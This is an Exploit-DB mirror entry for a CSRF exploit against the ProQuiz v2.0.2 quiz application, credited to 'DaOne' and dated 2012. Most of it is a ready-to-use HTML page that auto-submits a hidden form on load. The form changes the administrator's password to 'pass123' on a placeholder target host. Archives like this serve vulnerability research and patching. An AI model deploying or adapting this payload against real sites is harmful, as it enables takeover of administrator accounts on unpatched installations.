exploit-db-mirror/exploits/php/webapps/20550.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
641 B
Text

##########################################
[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability
[~] Author: DaOne
[~] Date: 19/8/2012
[~] Software Link: http://code.google.com/p/proquiz/downloads/list
##########################################
[#] [ CSRF Change Admin Password ]
</form>
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">
<input type="hidden" name="password" value="pass123"/>
<input type="hidden" name="cpassword" value="pass123"/>
</form>
</body>
</html>
##########################################